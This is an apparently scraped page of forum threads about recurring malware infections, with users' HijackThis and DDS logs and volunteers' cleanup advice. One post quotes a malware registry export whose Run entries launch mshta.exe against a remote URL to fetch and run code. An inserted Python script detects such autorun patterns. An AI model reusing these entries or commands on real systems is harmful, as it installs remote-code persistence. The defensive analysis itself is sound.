C:\WINDOWS\System32\ZoneLabs\isafe.exe
C:\Program Files\Common Files\EPSON\EBAPI\SAgent2.exe
C:\Program Files\Norton AntiVirus\navapsvc.exe
C:\Program Files\Norton AntiVirus\IWP\NPFMntor.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Common Files\Symantec Shared\CCPD-LC\symlcsvc.exe
C:\WINDOWS\system32\ZoneLabs\vsmon.exe
C:... Read more

Answer:Web Hijacker keeps coming back

Hi ucurl

Has this system been rebooted since you posted this Hijack log?

If so, please post a new log.
 

1 more replies
Relevance 48.79%

I have these same bugs every time I run Spybot. How do I permanently eliminate them, and what is a good Firefox extension for cookie control?
 

Answer:Same spyware coming back

 

3 more replies
Relevance 48.79%

It's not just browsers now, Steam as well. It shows up the adware and every time I click something it opens a new tab with more adware.
 

More replies
Relevance 48.79%

Hi - I recently got infected with a virus that added options to my toolbar (Fresh Search) which I managed to fix thanks to the help I saw posted here, but I still keep getting pop-ups and infections - SearchToolbar, Spyware.Msnagent and DownLoader.Trojan being the most recent. None of the anti-spyware, pop-up blockers or anti virus programs I have can stop the reinfections.

I have gone into safe mode, used CWShredder, CClean, Kill2Me, HSRemove and Stinger. Also RAVAntivirus online scan, Bitdefender online scan, AdAware SEplus and Norton Antivirus. I used Silent Runners and found some suspect entries, which I edited out of the registry using Registrar Lite, and I used Hijack This to find and fix some other suspicious entries.

But they all keep coming back, in one form or another. Not crippling like before, but really annoying!

Below is a recent Silent Runners report, followed by a HiJack This report:


"Silent Runners.vbs", revision 40.1, http://www.silentrunners.org/
Operating System: Windows 2000
Output limited to non-default values, except where indicated by "{++}"
Startup items buried in registry:
---------------------------------

HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ {++}
"internat.exe" = "internat.exe" [MS]
"NvMediaCenter" = "RUNDLL32.EXE D:\WINNT\System32\NVMCTRAY.DLL,NvTaskbarInit" [MS]
"NBJ" = ""D:\Program Files\Ahead\Nero BackItUp\NBJ.exe"" ["Ahead So... Read more

Answer:Virus Keeps Coming Back

16 more replies
Relevance 48.79%

DDS (Ver_09-07-30.01) - NTFSx86 NETWORK
Run by Michael at 19:00:59.98 on Sun 09/06/2009
Internet Explorer: 8.0.6001.18813
Microsoft® Windows Vista™ Home Basic 6.0.6002.2.1252.1.1033.18.765.240 [GMT -7:00]

AV: Protection System *On-access scanning enabled* (Outdated) {28e00e3b-806e-4533-925c-f4c3d79514b9}
SP: Windows Defender *enabled* (Updated) {D68DDC3A-831F-4FAE-9E44-DA132C1ACF46}

============== Running Processes ===============

C:\Windows\system32\wininit.exe
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k rpcss
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Program Files\McAfee\MPF\MPFSrv.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
C:\Program Files\Spyware Doctor\pctsAuxs.exe
C:\Program Files\Spyware Doctor\pctsSvc.exe
C:\Windows\System32\vds.exe
C:\Windows\Explorer.EXE
C:\PROGRA~1\McAfee\MSC\mcmscsvc.exe
c:\PROGRA~1\mcafee.com\ag... Read more

Answer:virus keeps coming back help!

Hello and welcome to Bleeping Computer

We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.

If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine. If you have not done so, include a clear description of the problems you're having, along with any steps you may have performed so far.

Upon completing the steps below another staff member will review and take the steps necessary with you to get your machine back in working order clean and free of malware.

If you have already posted a DDS log, please do so again, as your situation may have changed.
Use the 'Add Reply' and add the new log to this thread.

Thanks and again sorry for the delay.

We need to see some information about what is happening in your machine. Please perform the following scan:

Download DDS by sUBs from one of the following links. Save it to your desktop.
DDS.scr
DDS.pif
Double click on the DDS icon, allow it to run.
A small box will open, with an explanation about the tool. No input is needed, the scan is running.
Notepad will open with the results.
Foll... Read more

2 more replies
Relevance 48.79%

Hopefully I've included enough information and made this topic correctly...
 
Basically I had an issue where my microphone would mute itself, figured it was a virus, and ran malwarebytes. It found stuff, removed it, and everything worked fine... for about a few hours. A few hours later the same thing occurred, ran malwarebytes again and found the same thing: "dnsl64.exe" detected, along with other things that it appears to be downloading. No matter how many times I remove it it seems to come back, and googling dnsl64.exe popped up no results that I could find and then each scan (after a few hours) pops up a bunch of junk, even if I leave the computer idle. It also downloaded something that appeared to change my browser homepage to "search.snapdo.c*m" if that helps diagnose anything.
 
I've attached the MWB and FRST logs, hopefully they help diagnose what the problem is! Thank you in advance for any help, would really appreciate getting rid of this nasty thing.

More replies
Relevance 48.79%

Hi -- my computer has been infected with several trojans that keep coming back even after I've repeatedly removed them by performing scans with numerous antivirus/antispyware programs. Please help!! Please see the HijackThis log below (I've also run combofix, but the log is REALLY long):

Logfile of HijackThis v1.99.1
Scan saved at 10:53:44 PM, on 10/23/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\System32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe
C:\Program Files\Alwil Software\Avast4\ashServ.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\System32\wltrysvc.exe
C:\Program Files\Alwil Software\Avast4\ashMaiSv.exe
C:\Program Files\Alwil Software\Avast4\ashWebSv.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\ATI Technologies\ATI Control Panel\atiptaxx.exe
C:\WINDOWS\System32\bcmwltry.exe
C:\Program Files\Java\jre1.5.0_03\bin\jusched.exe
C:\Program Files\Adobe\Photoshop Album Starter Edition\3.0\Apps\apdproxy.exe
C:\WINDOWS\system32\carpserv.exe
C:\Program Files\QuickTime\QTTask.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\PROGRA~1\ALWILS~1\Avast4\ashDisp.exe
C:\WINDOWS\System32\spool\DRIVERS\W32X86\3\E_A10IC2.EXE
C:\Program Files\Skype\Phone\Sk... Read more

More replies
Relevance 48.79%

Woke up 2 days ago and my comp was infested. Spyware, adware, trojans, etc. Spent the last 2 days trying to clean it myself so here I am now pleading for help.

So far I've used the online scanners (probably 2-3 of them), Lavasoft's Ad-Aware, Spybot Search and Destroy, Super Anti Spyware, rinse and repeat.

It's not as bad now. I'm still getting pop-ups etc. Used SpyHunter to scan and here's what's left, supposedly...
IE Defender
SmitFraud
Starware
WinActive
SearchExplorerBar
Activity Monitor

Here's my HJT log. Hopefully this can help those who can help me.

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 10:35:52 AM, on 12/16/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16574)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\csrss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\System32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\Explorer.EXE
c:\program files\mcafee.com\agent\mcdetect.exe
c:\PROGRA~1\mcafee.com\agent\mctskshd.exe
C:\WINDOWS\System32\wdfmgr.exe
C:\Program Files\Viewpoint\Common\ViewpointService.exe
C:\WINDOWS\System32\alg.exe
C:\Program Files\Creative\SBLive\AudioHQ\AHQTB.EXE
C:\Program Files\McAfee.co... Read more

Answer:Help Please! Spyware etc keeps coming back!

Spent the last 3 days cleaning, scanning and cleaning my comp again. Spyware, adware, malware, trojans and even viruses keep coming back.

Some of them seem to just come back... I've removed (hopefully) vundo, js/psyne (spellcheck?), random trojans, hacking tools etc.

Right now AdAware is seeing Win32.Spyware.Acoona and Bargain Buddy. I could have sworn I've removed everything when I used SD Fix.
-------------------
Here's my HJT log....

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 12:23:44 PM, on 12/17/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16574)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\csrss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\System32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\Explorer.EXE
C:\PROGRA~1\Grisoft\AVG7\avgamsvr.exe
C:\PROGRA~1\Grisoft\AVG7\avgupsvc.exe
C:\PROGRA~1\Grisoft\AVG7\avgemc.exe
c:\program files\mcafee.com\agent\mcdetect.exe
c:\PROGRA~1\mcafee.com\agent\mctskshd.exe
C:\WINDOWS\System32\wdfmgr.exe
C:\Program Files\Viewpoint\Common\ViewpointService.exe
C:\WINDOWS\System32\alg.exe
C:\Program Files\Viewpoint\Viewpoint Manager\ViewMgr.exe
C:\Program Files\Creative\... Read more

2 more replies
Relevance 48.79%

Hi,

Having a problem with my laptop (64bit, Windows 7). A pop-up always comes up during startup to a webpage and only has a close button. Ending mshta.exe in task manager seems to close it temporarily, but it comes back after a few minutes. I've also noticed two (hidden) folders which are related to this under C:\Users, as I've not created these folders myself. One folder with an exe file called mshost.exe, a systemboot shortcut. The other with a RegWrite folder with the target: C:\Windows\System32\mshta.exe http://mrwiq.info/set_inf2.php?cccid=SCksjDDymdz0PiqvcwiQawJb8dH194dJ
and also a registry file which has the following:

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"SystemBootSCksjDDymdz0PiqvcwiQawJb8dH194dJ"="mshta.exe http://mrwiq.info/reg2.php?cccid=SCksjDDymdz0PiqvcwiQawJb8dH194dJ"
"RegWriteSCksjDDymdz0PiqvcwiQawJb8dH194dJ"="mshta.exe http://mrwiq.info/set_inf2.php?cccid=SCksjDDymdz0PiqvcwiQawJb8dH194dJ"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"RegWriteSCksjDDymdz0PiqvcwiQawJb8dH194dJ"="REG IMPORT C:/Users/Vincent/SoftRecovery/datSCksjDDymdz0PiqvcwiQawJb8dH194dJ.reg"

Tried deleting the folders and ran Malwarebytes. It seemed to have picked up the folders as malware, but after removing/deleting them it just comes back after reboot.
I've als... Read more

Answer:Pop up on desktop that keeps coming back

Hello and Welcome to Bleeping Computer!! My name is Gringo and I'll be glad to help you with your computer problems. I have put together some things for you to keep in mind while I am helping you to make things go easier and faster for both of us.

Please do not run any tools unless instructed to do so.
We ask you to run different tools in a specific order to ensure the malware is completely removed from your machine, and running any additional tools may detect false positives, interfere with our tools, or cause unforeseen damage or system instability.

Please do not attach logs or use code boxes, just copy and paste the text.
Due to the high volume of logs we receive it helps to receive everything in the same format, and code boxes make the logs very difficult to read. Also, attachments require us to download and open the reports when it is easier to just read the reports in your post.

Please read every post completely before doing anything.
Pay special attention to the NOTE: lines, these entries identify an individual issue or important step in the cleanup process.

Please provide feedback about your experience as we go.
A short statement describing how the computer is working helps us understand where to go next, for example: I am still getting redirected, the computer is running normally, etc. Please do not describe the computer as "the same", this requires the extra step of looking back at your previous post.

NOTE: At t... Read more

13 more replies
Relevance 48.79%
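The registry export quoted in the pop-up post above has two things worth checking for in any autorun listing: Run values that start mshta.exe with a remote URL, and a RunOnce value that runs REG IMPORT on a .reg file at the next logon, which would put deleted values back. As an added example (not part of the thread or of any tool named in it), this Python check flags both patterns in a .reg export; the sample export, its host name and identifier are constructed placeholders, and the rule names are hypothetical.

```python
import re

# Constructed sample modelled on the export quoted in the post; the host name,
# user name and identifier are placeholders, not the values from the thread.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"SystemBootEXAMPLEID"="mshta.exe http://host.example/reg2.php?cccid=EXAMPLEID"
"RegWriteEXAMPLEID"="mshta.exe http://host.example/set_inf2.php?cccid=EXAMPLEID"
"ctfmon"="C:\\Windows\\System32\\ctfmon.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"RegWriteEXAMPLEID"="REG IMPORT C:/Users/user/SoftRecovery/datEXAMPLEID.reg"
'''

# Per-user and per-machine Run / RunOnce keys, including the 32-bit view.
AUTORUN_KEY = re.compile(
    r'\\Software\\(?:Wow6432Node\\)?Microsoft\\Windows\\CurrentVersion\\Run(?:Once)?$',
    re.I)

# A value line is  "name"=data  or  @=data  (the key's default value).
VALUE = re.compile(r'^(@|"(?:[^"\\]|\\.)*")=(.*)$')

# Hypothetical rule names for the two patterns visible in the quoted export.
RULES = [
    ('mshta-remote-url', re.compile(r'\bmshta(?:\.exe)?\b.*?https?://', re.I)),
    ('reg-import-reseed', re.compile(r'\breg(?:\.exe)?\s+import\b', re.I)),
]


def _unescape(s):
    """Undo .reg string escaping: \\\\ becomes \\ and \\" becomes "."""
    return re.sub(r'\\(.)', r'\1', s)


def parse_reg(text):
    """Yield (key, value_name, string_data) for string values in a .reg export.

    Handles quoted REG_SZ values and hex(1)/hex(2) values (UTF-16LE strings,
    possibly wrapped over several lines with a trailing backslash).
    Other value types (dword, binary, multi-string) are skipped.
    """
    key = None
    joined = re.sub(r'\\\r?\n\s*', '', text)   # join wrapped hex lines
    for line in joined.splitlines():
        line = line.strip()
        if line.startswith('[') and line.endswith(']'):
            key = line[1:-1]
            continue
        m = VALUE.match(line)
        if not m or key is None:
            continue
        name = '(Default)' if m.group(1) == '@' else _unescape(m.group(1)[1:-1])
        data = m.group(2).strip()
        if len(data) >= 2 and data.startswith('"') and data.endswith('"'):
            yield key, name, _unescape(data[1:-1])
        elif data.lower().startswith(('hex(1):', 'hex(2):')):
            tokens = data.split(':', 1)[1].split(',')
            raw = bytes(int(t.strip(), 16) for t in tokens if t.strip())
            yield key, name, raw.decode('utf-16-le', errors='replace').rstrip('\x00')


def find_suspicious(text):
    """Return (Run|RunOnce, value_name, rule) for each autorun value a rule hits."""
    hits = []
    for key, name, data in parse_reg(text):
        if not AUTORUN_KEY.search(key):
            continue
        for rule, rx in RULES:
            if rx.search(data):
                hits.append((key.rsplit('\\', 1)[-1], name, rule))
    return hits


if __name__ == '__main__':
    for where, name, rule in find_suspicious(SAMPLE_REG):
        print(f'{where:8} {name:24} {rule}')
```

A `reg-import-reseed` hit means the .reg file named in the value should be inspected and removed together with the Run values, otherwise the next logon can import them again.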

Hello and Welcome to the forums! My name is Gringo and I'll be glad to help you with your computer problems.

Some things to remember while we are working together.
Do not run any other tool until instructed to do so!
Please do not attach logs or put in code boxes.
Tell me about any problems that have occurred during the fix.
Tell me of any other symptoms you may be having as these can help also.
Do not run anything while running a fix.
Do not run any other tool until instructed to do so!

Click on the Watch Topic Button and select Immediate Notification and click on proceed, this will help you to get notified faster when I have replied and make the cleaning process faster.

Please print out or make a copy in Notepad of any instructions given, as sometimes it is necessary to go offline and you will lose access to them.

For x64 bit systems download Farbar Recovery Scan Tool x64 and save it to a flash drive. Plug the flash drive into the infected PC. Enter System Recovery Options.

To enter System Recovery Options from the Advanced Boot Options:
Restart the computer.
As soon as the BIOS is loaded begin tapping the F8 key until Advanced Boot Options appears.
Use the arrow keys to select the Repair your computer menu item.
Select US as the keyboard language settings, and then click Next.
Select the operating system you want to repair, and then click Next.
Select your user account and click Next.

To enter System Recovery Options by using Windows installation disc:
Insert the ... Read more

Answer:consrv.dll keeps coming back

The forum said that the post was too long when I tried to paste it in, so I just attached the log file.

14 more replies
Relevance 48.79%

I am running on Windows2000 and have tried what MFDnSC advised another user and did this yesterday:

"Fix these with HJT
O4 - HKLM\..\Run: [Windows Service] C:\WINDOWS\system32\prvdi.exe
O4 - HKCU\..\Run: [Windows Service] C:\WINDOWS\system32\prvdi.exe"

but today, these files show up again. Also, McAfee reports deleting dload.exe once every few hours. It does not find any virus, though.

I also tried:
Sophos SAV32CLI
Xoft Spy
SpyBot
AdAware SE

I also looked at windows and system32 entries, win.ini and system.ini, but nothing in there.

This is how my HJT log looks like after I have deleted the two prvdi.exe today:

Logfile of HijackThis v1.99.0
Scan saved at 13:27:51, on 01/31/2005
Platform: Windows 2000 SP4 (WinNT 5.00.2195)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINNT\System32\smss.exe
C:\WINNT\SYSTEM32\winlogon.exe
C:\WINNT\system32\services.exe
C:\WINNT\system32\lsass.exe
C:\WINNT\system32\svchost.exe
C:\WINNT\System32\svchost.exe
C:\WINNT\system32\spoolsv.exe
C:\WINNT\system32\regsvc.exe
C:\WINNT\system32\MSTask.exe
C:\WINNT\System32\WBEM\WinMgmt.exe
C:\WINNT\Explorer.EXE
C:\WINNT\system32\tp4mon.exe
C:\PROGRA~1\COMMON~1\PCSuite\DATALA~1\DATALA~1.EXE
C:\WINNT\system32\WLANSTA.EXE
C:\PROGRA~1\mcafee.com\vso\mcvsshld.exe
C:\PROGRA~1\mcafee.com\agent\mcagent.exe
c:\progra~1\mcafee.com\vso\mcvsescn.exe
c:\PROGRA~1\mcafee.com\vso\mcvsrte.exe
c:\PROGRA~1\mcafee.com\vso\mcshield.exe
C:\PROGRA~1\COMMON~1\PCSuite\Services\SERVIC~1.EX... Read more

Answer:Downloader-ME keeps coming back

You have to delete the file in safe mode AND

START RUN key in %temp% - Edit Select all File Delete

AS it is running out of the temp dir - C:\DOCUME~1\MARTIN~1\LOCALS~1\Temp\prvdi.exe
 

3 more replies
Relevance 48.79%

Hello,

I believe I have a variation of the Zero Access Rootkit. It creates a file consrv.dll in the system32 directory. Hitmanpro has detected it and has tried to remove it, but it keeps reappearing.
Other symptoms have included the loss of internet connection (removing McAfee has resolved that issue). The windows firewall and service is completely missing and I have not been able to restore it. If left alone the system becomes unstable and I am forced to do a restore just to get it to boot.
I am running Windows 7 Home Prem 64 bit.
I have run the following without success: Superantispyware, Malwarebytes, Spybot, rootkitbuster, Sophos, TDSSKiller, Kaspersky Rescue disk and a few others. All without success.

I have attached the log files from DDS and GMER. Although on GMER it would not let me check off most items (boxes were greyed out, I suspect it was because of the 64 bit OS).

I'm running out of ideas.... help...

Thanks,

Larry

Answer:Another zero access.... just keeps coming back...

Hi Larry! My secret agent name on the forums is SweetTech (you can call me Agent ST for short), it's a pleasure to meet you. I would be glad to take a look at your log and help you with solving any malware problems.

If you have since resolved the issues you were originally experiencing, or have received help elsewhere, please inform me so that this topic can be closed. If you have not, please adhere to the guidelines below and then follow instructions as outlined further below:

Logs from malware removal programs (OTL is one of them) can take some time to analyze. I need you to be patient while I analyze any logs you post. Please remember, I am a volunteer, and I do have a life outside of these forums.
Please make sure to carefully read any instruction that I give you. Attention to detail is important! Since I cannot see or directly interact with your computer I am dependent on you to "be my eyes" and provide as much information as you can regarding the current state of your computer.
If you're not sure, or if something unexpected happens, do NOT continue! Stop and ask!
In Windows Vista and Windows 7, all tools need to be started by right clicking and selecting Run as Administrator!
If I instruct you to download a specific tool in which you already have, please delete the copy that you have and re-download the tool. The reason I ask you to do this is because these tools are updated fairly regularly.
... Read more

7 more replies
Relevance 48.79%

My USB keeps getting infected with fooool.exe. I use the Flash_disinfector provided by you guys but it keeps getting infected. I scanned with Superantispyware and it didn't find it though it is there. I tried avast and it didn't find it too.

Any tool to remove it?

I can see Fooool.exe when I run a Live Linux distribution and check what's on my USB stick. Anyway, I know it is there because my USB stick keeps getting infected and when I open its Autorun.inf the open command refers to fooool.exe.

Help plz!!

Answer:Fooool.exe Keeps Coming Back

I did a quick search and it seems that fooool.exe is related to explorer.exe that I posted about earlier, that some antiviruses were locating it as a virus and I thought back then that they were detecting the legitimate one.

Anyway, I still need help on how to remove this infection.

4 more replies
Relevance 48.79%

I've been getting the Win 7 Antivirus problem every few days lately. I can run a scan with mbam and kill it, but it keeps returning. Any advice? Here's a HijackThis log:
Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 4:48:46 PM, on 1/2/2012
Platform: Windows 7 SP1 (WinNT 6.00.3505)
MSIE: Internet Explorer v8.00 (8.00.7601.17514)
Boot mode: Normal

Running processes:
C:\Program Files (x86)\Sophos\Sophos Anti-Virus\SavService.exe
C:\Program Files (x86)\Steam\Steam.exe
C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
C:\Program Files\Winamp\winampa.exe
C:\Program Files (x86)\Sophos\AutoUpdate\ALMon.exe
C:\Program Files (x86)\Sophos\Sophos Anti-Virus\SAVAdminService.exe
C:\Program Files (x86)\Sophos\AutoUpdate\ALsvc.exe
C:\Program Files (x86)\Sophos\Sophos Anti-Virus\Web Intelligence\swi_service.exe
C:\Program Files\VMware\VMware View\Client\bin\wsnm.exe
C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamservice.exe
C:\Program Files\Winamp\winamp.exe
C:\Program Files (x86)\Notepad++\notepad++.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\Program Files\Mozilla Firefox\plugin-container.exe
C:\Program Files\... Read more

Answer:Win 7 Antivirus keeps coming back

Hello and welcome to Bleeping Computer! I am HelpBot: an automated program designed to help the Bleeping Computer Staff better assist you! This message contains very important information, so please read through all of it before doing anything.

We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.

To help Bleeping Computer better assist you please perform the following steps:

***************************************************

In order to continue receiving help at BleepingComputer.com, YOU MUST tell me if you still need help or if your issue has already been resolved on your own or through another resource! To tell me this, please click on the following link and follow the instructions there.

CLICK THIS LINK >>> http://www.bleepingcomputer.com/logreply/435844 <<< CLICK THIS LINK

If you no longer need help, then all you needed to do was the previous instructions of telling me so. You can skip the rest of this post. If you do need help please continue with Step 2 below.

***************************************************

If you still need help, I would like you to post a Reply to this topic (click the "Add Reply" button in the lo... Read more

2 more replies
Relevance 48.79%

A week ago I got the Win 7 Antispyware virus. I ran a system restore to 3 days earlier, and for a while the computer ran normally. Then, 3 nights ago, the virus came back. Now, even if I do a system restore, the virus comes back in a day (interestingly always around 1-2 AM). It usually begins with a window popping up saying Adobe needs to update, even if I try to exit out of the screen, it just pops up again. Then right after the Win 7 virus activates.

.
DDS (Ver_2011-08-26.01) - NTFSAMD64
Internet Explorer: 9.0.8112.16421 BrowserJavaVersion: 1.6.0_26
Run by avkuznet at 14:52:30 on 2011-12-17
Microsoft Windows 7 Professional 6.1.7601.1.1252.1.1033.18.8182.5222 [GMT -5:00]
.
AV: Trend Micro OfficeScan Antivirus *Enabled/Updated* {7193B549-236F-55EE-9AEC-F65279E59A92}
SP: Trend Micro OfficeScan Anti-spyware *Enabled/Updated* {CAF254AD-0555-5A60-A05C-CD200262D02F}
SP: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
============== Running Processes ===============
.
C:\Windows\system32\wininit.exe
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\nvvsvc.exe
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k netsvcs
C:\Program File... Read more

Answer:Win 7 AntiSpyware Keeps coming back.

Hello and welcome to Bleeping Computer! I am HelpBot: an automated program designed to help the Bleeping Computer Staff better assist you! This message contains very important information, so please read through all of it before doing anything.

We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.

To help Bleeping Computer better assist you please perform the following steps:

***************************************************

In order to continue receiving help at BleepingComputer.com, YOU MUST tell me if you still need help or if your issue has already been resolved on your own or through another resource! To tell me this, please click on the following link and follow the instructions there.

CLICK THIS LINK >>> http://www.bleepingcomputer.com/logreply/433026 <<< CLICK THIS LINK

If you no longer need help, then all you needed to do was the previous instructions of telling me so. You can skip the rest of this post. If you do need help please continue with Step 2 below.

***************************************************

If you still need help, I would like you to post a Reply to this topic (click the "Add Reply" button in the lo... Read more

2 more replies
Relevance 48.79%

I don't seem to be able to remove this persistent spyware by any means. It always sneaks back.

This is what my HijackThis log looks like:

Logfile of HijackThis v1.99.0
Scan saved at 21:58:28, on 7.1.2005
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgamsvr.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgupsvc.exe
C:\WINDOWS\system32\slserv.exe
C:\WINDOWS\System32\STDSB.exe
C:\Program Files\Synaptics\SynTP\SynTPLpr.exe
C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
C:\WINDOWS\SOUNDMAN.EXE
C:\Program Files\Common Files\Real\Update_OB\realsched.exe
C:\Program Files\Java\j2re1.4.2_06\bin\jusched.exe
C:\Program Files\Google\Gmail Notifier\G001-1.0.24.0\gnotify.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgcc.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgemc.exe
C:\PROGRA~1\COMMON~1\PCSuite\DATALA~1\DATALA~1.EXE
C:\Program Files\Microsoft AntiSpyware\gcasServ.exe
C:\WINDOWS\system32\ctfmon.exe
C:\PROGRA~1\COMMON~1\PCSuite\Services\SERVIC~1.EXE
C:\Program Files\Microsoft AntiSpyware\gcasDtServ.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\Documents and Settings\PC\Dokumenty\My Downloads\hijackthis\HijackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,... Read more

Answer:ISTSVC keeps coming back

Fix these

O4 - HKLM\..\Run: [DMeFD0nZr] C:\WINDOWS\isgeem.exe

O23 - Service: SmartLinkService - Unknown - slserv.exe (file missing)
O23 - Service: ZESOFT - Unknown - C:\WINDOWS\zeta.exe (file missing)

Boot to safe mode and delete C:\WINDOWS\isgeem.exe

Boot and post a new log
 

1 more replies

For the past couple weeks or so my computer has been infected. They've been all sorts of different viruses and Norton Antivirus 2006 scans, finds them, and removes them but they keep coming back. I tried doing a system restore to about 2 months ago and the problem didn't resolve itself. I've also tried using Roguescanfix and smitRem to no avail. My computer is running Windows XP Media Center Edition if that helps.
Any help is appreciated. thanks

Answer:Viruses Keep Coming Back

Welcome to bleepingcomputer slicktrick689

Let's try this before we go to HiJackThis

Run the NAV again then do the following as you may be reinstalling the virus.

Empty your Recycle Bin.

Next

Update your windows: Windows Update

Next

Create a new Restore Point:
Go to Start > All Programs > Accessories > System Tools > System Restore
Then when Restore opens, select Create a new restore point and click Next
Give the restore point a name like New and clean > Click Create

Then delete old Restore points:
Go to Start > All Programs > Accessories > System Tools > Disk Cleanup > Click Ok. Click the more options tab > notice System Restore > click clean up > Reboot

A little extra protection

Now install SpywareBlaster 3.5.1.

QUOTE
Prevent the installation of ActiveX-based spyware, adware, browser hijackers, dialers, and other potentially unwanted software. Block spyware/tracking cookies in Internet Explorer and Mozilla/Firefox. Restrict the actions of potentially unwanted sites in Internet Explorer. SpywareBlaster can help keep your system spyware-free and secure, without interfering with the "good side" of the web.

update weekly

1 more replies

They're called Error Cleaner, Privacy Protector, and Spyware&Malware protection

But I know they're viruses because pop ups continually come up with them on, and they won't delete... Help please!
HijackThis log:
Logfile of HijackThis v1.99.1
Scan saved at 10:47:39 AM, on 12/26/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16574)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe
C:\Program Files\Alwil Software\Avast4\ashServ.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Common Files\Symantec Shared\ccApp.exe
